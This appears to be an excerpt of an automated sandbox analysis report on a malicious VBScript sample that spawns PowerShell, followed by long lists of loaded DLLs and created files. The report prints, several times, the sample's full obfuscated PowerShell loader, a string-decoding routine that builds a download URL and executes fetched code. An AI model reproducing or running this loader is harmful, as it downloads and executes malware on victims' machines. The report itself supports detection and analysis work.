      Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
      Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
      Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
      Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
      Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
      Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
      Wscript starts Powershell (via cmd or directly)
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Russule; function Tvangsmiddels($Backgeared){$Submerge=4;do {$Ima+=$Backgeared[$Submerge];$Pjat=Format-List;$Submerge+=5} until(!$Backgeared[$Submerge])$Ima}function Ankomsterne($Dolors20){ .($Indeficiency) ($Dolors20)}$Ergoterapeutskoler=Tvangsmiddels 'Int,NHypeeMeteTObel.NykaW';$Ergoterapeutskoler+=Tvangsmiddels ',ngeEClieBErn cTricLHalviCen,eHom nForst';$Postethmoid=Tvangsmiddels 'SivaMTogfoDemizE triVarslBulllFlaca Da /';$Recuperator=Tvangsmiddels ' SinT A.ol Mi.svo d1Vi k2';$Destalinises136=' Nov[PussNBukseMisttGevi. WilS veeSkylrSvanVan oI Semc DiseAftepBetiO StoiWestn T,ltKlynM LacahydrNEft AEl aG B dE DisrSupp]Henv:Gunh: SmasCor E LreC acoustewrBargiFlu tPupiyFu fP ympRItenOSulptOffeOFinaC,alaoHaanlJ,me=Send$ TyfrSgekEMythC StoUEmbeP eskePolir ,araU maTBestOK,olR';$Postethmoid+=Tvangsmiddels 'Jnan5 Phr.Cham0cel, Ph,n(AssiWIn.eiHe enCo ndRiddo NonwCo gsPsyc AbroNFodeTNeut Pse1Ddni0genn. Shi0 Und; Ana SquiWAnstiW,rbnInte6 Tin4Pers; Hys AntexSpej6 Lus4kirk;Farb U,fjrGeo.vMacr:Efte1B ot3No.i4 S,u. egu0 nvr)term Ma.GLatieSvalcIndsk UdmoAmts/Repr2G rn0Kern1 niv0Dels0N bo1.rug0Re d1Tomo SlibFUd.eiAabnru.reeRamsf SigoRef xudv /Fode1fryg3 Dem4Derv.Retr0';$pseudocosta=Tvangsmiddels 'cannUud.rsPracE SemRGuar-Bu ia harGOpb,ePhilNHotet';$Butter=Tvangsmiddels ' rsthLamitBrent ,orpSubesanth:amat/I.gm/nordaAudig Selh SinaM gryD skehelmzBogkaMaoiyGnide MetaOunctChee. I diTrffrOilc/ intkB.haiPr,cd VedsBrom/ CatTwienyVek.rKanvoT.adsAfgiiDukknM kseOmnis Sub.Pu.hlEngazMellh';$Misfortuner=Tvangsmiddels 'Sag,>';$Indeficiency=Tvangsmiddels 'Sa gi eade P,rX';$Semidefiniteness139='Vaabenmrkerne';$Fiskerflaaden='\Hikes.Ove';Ankomsterne (Tvangsmiddels ' va$AtteGSubslhumaO agtbHeksahandlTelt: StaN WhiEUdruPEsc eA raNBrodd emmiF gesAvis=evol$slutESt rNSangvDavi: AliA SnnpUnd.PNotrdWhydaA phT DevaRepa+Beu $Kibyf oaiGibbs lbrKGe meB,ggr PosFHalsLTandAPostAExo.dR vrEBilln');Ankomsterne (Tvangsmiddels 'Lige$Sed,GBe tL,resoSounBTrumaForllOpb :VermKOdondclinf CerUO krlAngsdObcl= Svl$Indubsog UAntit athtWiree MesRProf. EvoS Undpb sclLegeiSjllTIn u( I f$ HaaMKompI L,dSPropFBillOUranR braT TilUCrisNK.oaeOmslrSkid)');Ankomsterne (Tvangsmiddels $Destalinises136);$Butter=$Kdfuld[0];$Keyseat=(Tvangsmiddels ' Lim$ QuiG,orsL,ubboUnivBCensAOverlTjen:Pi.kIModfnPl sFp ntO ,ksrFrinMKum ATr.nT.abbIXy ioParaNGomeSDegliPo iNDodedOldnSTopaAK imTBulbsTils=Sucrn,alsEUmu w Tyd-DelsOInt,B.undJInhaEKir cIn eTReso P.aS T,yyaspasBlint.amie UnpMBou .Chef$Bl,rESkanRH stGMedsoAntitRespe VeaRFaktaAltrPVercEFormuFritTAgris Re KNontOGa.llPulpeSyndr');Ankomsterne ($Keyseat);Ankomsterne (Tvangsmiddels 'Slvp$Kn kIrushnPennfChicoMajbrRdtjm Coma OvetCataiRelaoVertnInddschloiTak n Ta.dportsSeisaPastt FidsHost.BagsHShore vfdaBur.dn rremirarMuresfarl[Purp$Anopp TegsSimieKnuruFlomdshi oPraecEinsoT rts Dkkt etraobse] odi=Acti$BolsPFondophi sPriztLimieButttBackh KhamBomroOu biUdkrd');$
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Russule; function Tvangsmiddels($Backgeared){$Submerge=4;do {$Ima+=$Backgeared[$Submerge];$Pjat=Format-List;$Submerge+=5} until(!$Backgeared[$Submerge])$Ima}function Ankomsterne($Dolors20){ .($Indeficiency) ($Dolors20)}$Ergoterapeutskoler=Tvangsmiddels 'Int,NHypeeMeteTObel.NykaW';$Ergoterapeutskoler+=Tvangsmiddels ',ngeEClieBErn cTricLHalviCen,eHom nForst';$Postethmoid=Tvangsmiddels 'SivaMTogfoDemizE triVarslBulllFlaca Da /';$Recuperator=Tvangsmiddels ' SinT A.ol Mi.svo d1Vi k2';$Destalinises136=' Nov[PussNBukseMisttGevi. WilS veeSkylrSvanVan oI Semc DiseAftepBetiO StoiWestn T,ltKlynM LacahydrNEft AEl aG B dE DisrSupp]Henv:Gunh: SmasCor E LreC acoustewrBargiFlu tPupiyFu fP ympRItenOSulptOffeOFinaC,alaoHaanlJ,me=Send$ TyfrSgekEMythC StoUEmbeP eskePolir ,araU maTBestOK,olR';$Postethmoid+=Tvangsmiddels 'Jnan5 Phr.Cham0cel, Ph,n(AssiWIn.eiHe enCo ndRiddo NonwCo gsPsyc AbroNFodeTNeut Pse1Ddni0genn. Shi0 Und; Ana SquiWAnstiW,rbnInte6 Tin4Pers; Hys AntexSpej6 Lus4kirk;Farb U,fjrGeo.vMacr:Efte1B ot3No.i4 S,u. egu0 nvr)term Ma.GLatieSvalcIndsk UdmoAmts/Repr2G rn0Kern1 niv0Dels0N bo1.rug0Re d1Tomo SlibFUd.eiAabnru.reeRamsf SigoRef xudv /Fode1fryg3 Dem4Derv.Retr0';$pseudocosta=Tvangsmiddels 'cannUud.rsPracE SemRGuar-Bu ia harGOpb,ePhilNHotet';$Butter=Tvangsmiddels ' rsthLamitBrent ,orpSubesanth:amat/I.gm/nordaAudig Selh SinaM gryD skehelmzBogkaMaoiyGnide MetaOunctChee. I diTrffrOilc/ intkB.haiPr,cd VedsBrom/ CatTwienyVek.rKanvoT.adsAfgiiDukknM kseOmnis Sub.Pu.hlEngazMellh';$Misfortuner=Tvangsmiddels 'Sag,>';$Indeficiency=Tvangsmiddels 'Sa gi eade P,rX';$Semidefiniteness139='Vaabenmrkerne';$Fiskerflaaden='\Hikes.Ove';Ankomsterne (Tvangsmiddels ' va$AtteGSubslhumaO agtbHeksahandlTelt: StaN WhiEUdruPEsc eA raNBrodd emmiF gesAvis=evol$slutESt rNSangvDavi: AliA SnnpUnd.PNotrdWhydaA phT DevaRepa+Beu $Kibyf oaiGibbs lbrKGe meB,ggr PosFHalsLTandAPostAExo.dR vrEBilln');Ankomsterne (Tvangsmiddels 'Lige$Sed,GBe tL,resoSounBTrumaForllOpb :VermKOdondclinf CerUO krlAngsdObcl= Svl$Indubsog UAntit athtWiree MesRProf. EvoS Undpb sclLegeiSjllTIn u( I f$ HaaMKompI L,dSPropFBillOUranR braT TilUCrisNK.oaeOmslrSkid)');Ankomsterne (Tvangsmiddels $Destalinises136);$Butter=$Kdfuld[0];$Keyseat=(Tvangsmiddels ' Lim$ QuiG,orsL,ubboUnivBCensAOverlTjen:Pi.kIModfnPl sFp ntO ,ksrFrinMKum ATr.nT.abbIXy ioParaNGomeSDegliPo iNDodedOldnSTopaAK imTBulbsTils=Sucrn,alsEUmu w Tyd-DelsOInt,B.undJInhaEKir cIn eTReso P.aS T,yyaspasBlint.amie UnpMBou .Chef$Bl,rESkanRH stGMedsoAntitRespe VeaRFaktaAltrPVercEFormuFritTAgris Re KNontOGa.llPulpeSyndr');Ankomsterne ($Keyseat);Ankomsterne (Tvangsmiddels 'Slvp$Kn kIrushnPennfChicoMajbrRdtjm Coma OvetCataiRelaoVertnInddschloiTak n Ta.dportsSeisaPastt FidsHost.BagsHShore vfdaBur.dn rremirarMuresfarl[Purp$Anopp TegsSimieKnuruFlomdshi oPraecEinsoT rts Dkkt etraobse] odi=Acti$BolsPFondophi sPriztLimieButttBackh KhamBomroOu biUdkrd');$Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess Stats: CPU usage > 49%
      Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
      Source: SKMBT20783_ZM.vbsInitial sample: Strings found which are bigger than 50
      Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 5868
      Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 5868Jump to behavior
      Source: classification engineClassification label: mal84.expl.evad.winVBS@6/9@21/1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Hikes.OveJump to behavior
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6800:120:WilError_03
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wevutkbq.ifc.ps1Jump to behavior
      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SKMBT20783_ZM.vbs"
      Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
      Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SKMBT20783_ZM.vbs"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Russule; function Tvangsmiddels($Backgeared){$Submerge=4;do {$Ima+=$Backgeared[$Submerge];$Pjat=Format-List;$Submerge+=5} until(!$Backgeared[$Submerge])$Ima}function Ankomsterne($Dolors20){ .($Indeficiency) ($Dolors20)}$Ergoterapeutskoler=Tvangsmiddels 'Int,NHypeeMeteTObel.NykaW';$Ergoterapeutskoler+=Tvangsmiddels ',ngeEClieBErn cTricLHalviCen,eHom nForst';$Postethmoid=Tvangsmiddels 'SivaMTogfoDemizE triVarslBulllFlaca Da /';$Recuperator=Tvangsmiddels ' SinT A.ol Mi.svo d1Vi k2';$Destalinises136=' Nov[PussNBukseMisttGevi. WilS veeSkylrSvanVan oI Semc DiseAftepBetiO StoiWestn T,ltKlynM LacahydrNEft AEl aG B dE DisrSupp]Henv:Gunh: SmasCor E LreC acoustewrBargiFlu tPupiyFu fP ympRItenOSulptOffeOFinaC,alaoHaanlJ,me=Send$ TyfrSgekEMythC StoUEmbeP eskePolir ,araU maTBestOK,olR';$Postethmoid+=Tvangsmiddels 'Jnan5 Phr.Cham0cel, Ph,n(AssiWIn.eiHe enCo ndRiddo NonwCo gsPsyc AbroNFodeTNeut Pse1Ddni0genn. Shi0 Und; Ana SquiWAnstiW,rbnInte6 Tin4Pers; Hys AntexSpej6 Lus4kirk;Farb U,fjrGeo.vMacr:Efte1B ot3No.i4 S,u. egu0 nvr)term Ma.GLatieSvalcIndsk UdmoAmts/Repr2G rn0Kern1 niv0Dels0N bo1.rug0Re d1Tomo SlibFUd.eiAabnru.reeRamsf SigoRef xudv /Fode1fryg3 Dem4Derv.Retr0';$pseudocosta=Tvangsmiddels 'cannUud.rsPracE SemRGuar-Bu ia harGOpb,ePhilNHotet';$Butter=Tvangsmiddels ' rsthLamitBrent ,orpSubesanth:amat/I.gm/nordaAudig Selh SinaM gryD skehelmzBogkaMaoiyGnide MetaOunctChee. I diTrffrOilc/ intkB.haiPr,cd VedsBrom/ CatTwienyVek.rKanvoT.adsAfgiiDukknM kseOmnis Sub.Pu.hlEngazMellh';$Misfortuner=Tvangsmiddels 'Sag,>';$Indeficiency=Tvangsmiddels 'Sa gi eade P,rX';$Semidefiniteness139='Vaabenmrkerne';$Fiskerflaaden='\Hikes.Ove';Ankomsterne (Tvangsmiddels ' va$AtteGSubslhumaO agtbHeksahandlTelt: StaN WhiEUdruPEsc eA raNBrodd emmiF gesAvis=evol$slutESt rNSangvDavi: AliA SnnpUnd.PNotrdWhydaA phT DevaRepa+Beu $Kibyf oaiGibbs lbrKGe meB,ggr PosFHalsLTandAPostAExo.dR vrEBilln');Ankomsterne (Tvangsmiddels 'Lige$Sed,GBe tL,resoSounBTrumaForllOpb :VermKOdondclinf CerUO krlAngsdObcl= Svl$Indubsog UAntit athtWiree MesRProf. EvoS Undpb sclLegeiSjllTIn u( I f$ HaaMKompI L,dSPropFBillOUranR braT TilUCrisNK.oaeOmslrSkid)');Ankomsterne (Tvangsmiddels $Destalinises136);$Butter=$Kdfuld[0];$Keyseat=(Tvangsmiddels ' Lim$ QuiG,orsL,ubboUnivBCensAOverlTjen:Pi.kIModfnPl sFp ntO ,ksrFrinMKum ATr.nT.abbIXy ioParaNGomeSDegliPo iNDodedOldnSTopaAK imTBulbsTils=Sucrn,alsEUmu w Tyd-DelsOInt,B.undJInhaEKir cIn eTReso P.aS T,yyaspasBlint.amie UnpMBou .Chef$Bl,rESkanRH stGMedsoAntitRespe VeaRFaktaAltrPVercEFormuFritTAgris Re KNontOGa.llPulpeSyndr');Ankomsterne ($Keyseat);Ankomsterne (Tvangsmiddels 'Slvp$Kn kIrushnPennfChicoMajbrRdtjm Coma OvetCataiRelaoVertnInddschloiTak n Ta.dportsSeisaPastt FidsHost.BagsHShore vfdaBur.dn rremirarMuresfarl[Purp$Anopp TegsSimieKnuruFlomdshi oPraecEinsoT rts Dkkt etraobse] odi=Acti$BolsPFondophi sPriztLimieButttBackh KhamBomroOu biUdkrd');$
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Russule; function Tvangsmiddels($Backgeared){$Submerge=4;do {$Ima+=$Backgeared[$Submerge];$Pjat=Format-List;$Submerge+=5} until(!$Backgeared[$Submerge])$Ima}function Ankomsterne($Dolors20){ .($Indeficiency) ($Dolors20)}$Ergoterapeutskoler=Tvangsmiddels 'Int,NHypeeMeteTObel.NykaW';$Ergoterapeutskoler+=Tvangsmiddels ',ngeEClieBErn cTricLHalviCen,eHom nForst';$Postethmoid=Tvangsmiddels 'SivaMTogfoDemizE triVarslBulllFlaca Da /';$Recuperator=Tvangsmiddels ' SinT A.ol Mi.svo d1Vi k2';$Destalinises136=' Nov[PussNBukseMisttGevi. WilS veeSkylrSvanVan oI Semc DiseAftepBetiO StoiWestn T,ltKlynM LacahydrNEft AEl aG B dE DisrSupp]Henv:Gunh: SmasCor E LreC acoustewrBargiFlu tPupiyFu fP ympRItenOSulptOffeOFinaC,alaoHaanlJ,me=Send$ TyfrSgekEMythC StoUEmbeP eskePolir ,araU maTBestOK,olR';$Postethmoid+=Tvangsmiddels 'Jnan5 Phr.Cham0cel, Ph,n(AssiWIn.eiHe enCo ndRiddo NonwCo gsPsyc AbroNFodeTNeut Pse1Ddni0genn. Shi0 Und; Ana SquiWAnstiW,rbnInte6 Tin4Pers; Hys AntexSpej6 Lus4kirk;Farb U,fjrGeo.vMacr:Efte1B ot3No.i4 S,u. egu0 nvr)term Ma.GLatieSvalcIndsk UdmoAmts/Repr2G rn0Kern1 niv0Dels0N bo1.rug0Re d1Tomo SlibFUd.eiAabnru.reeRamsf SigoRef xudv /Fode1fryg3 Dem4Derv.Retr0';$pseudocosta=Tvangsmiddels 'cannUud.rsPracE SemRGuar-Bu ia harGOpb,ePhilNHotet';$Butter=Tvangsmiddels ' rsthLamitBrent ,orpSubesanth:amat/I.gm/nordaAudig Selh SinaM gryD skehelmzBogkaMaoiyGnide MetaOunctChee. I diTrffrOilc/ intkB.haiPr,cd VedsBrom/ CatTwienyVek.rKanvoT.adsAfgiiDukknM kseOmnis Sub.Pu.hlEngazMellh';$Misfortuner=Tvangsmiddels 'Sag,>';$Indeficiency=Tvangsmiddels 'Sa gi eade P,rX';$Semidefiniteness139='Vaabenmrkerne';$Fiskerflaaden='\Hikes.Ove';Ankomsterne (Tvangsmiddels ' va$AtteGSubslhumaO agtbHeksahandlTelt: StaN WhiEUdruPEsc eA raNBrodd emmiF gesAvis=evol$slutESt rNSangvDavi: AliA SnnpUnd.PNotrdWhydaA phT DevaRepa+Beu $Kibyf oaiGibbs lbrKGe meB,ggr PosFHalsLTandAPostAExo.dR vrEBilln');Ankomsterne (Tvangsmiddels 'Lige$Sed,GBe tL,resoSounBTrumaForllOpb :VermKOdondclinf CerUO krlAngsdObcl= Svl$Indubsog UAntit athtWiree MesRProf. EvoS Undpb sclLegeiSjllTIn u( I f$ HaaMKompI L,dSPropFBillOUranR braT TilUCrisNK.oaeOmslrSkid)');Ankomsterne (Tvangsmiddels $Destalinises136);$Butter=$Kdfuld[0];$Keyseat=(Tvangsmiddels ' Lim$ QuiG,orsL,ubboUnivBCensAOverlTjen:Pi.kIModfnPl sFp ntO ,ksrFrinMKum ATr.nT.abbIXy ioParaNGomeSDegliPo iNDodedOldnSTopaAK imTBulbsTils=Sucrn,alsEUmu w Tyd-DelsOInt,B.undJInhaEKir cIn eTReso P.aS T,yyaspasBlint.amie UnpMBou .Chef$Bl,rESkanRH stGMedsoAntitRespe VeaRFaktaAltrPVercEFormuFritTAgris Re KNontOGa.llPulpeSyndr');Ankomsterne ($Keyseat);Ankomsterne (Tvangsmiddels 'Slvp$Kn kIrushnPennfChicoMajbrRdtjm Coma OvetCataiRelaoVertnInddschloiTak n Ta.dportsSeisaPastt FidsHost.BagsHShore vfdaBur.dn rremirarMuresfarl[Purp$Anopp TegsSimieKnuruFlomdshi oPraecEinsoT rts Dkkt etraobse] odi=Acti$BolsPFondophi sPriztLimieButttBackh KhamBomroOu biUdkrd');$Jump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptnet.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: webio.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: cabinet.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: pcacli.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sfc_os.dllJump to behavior
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: esscli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
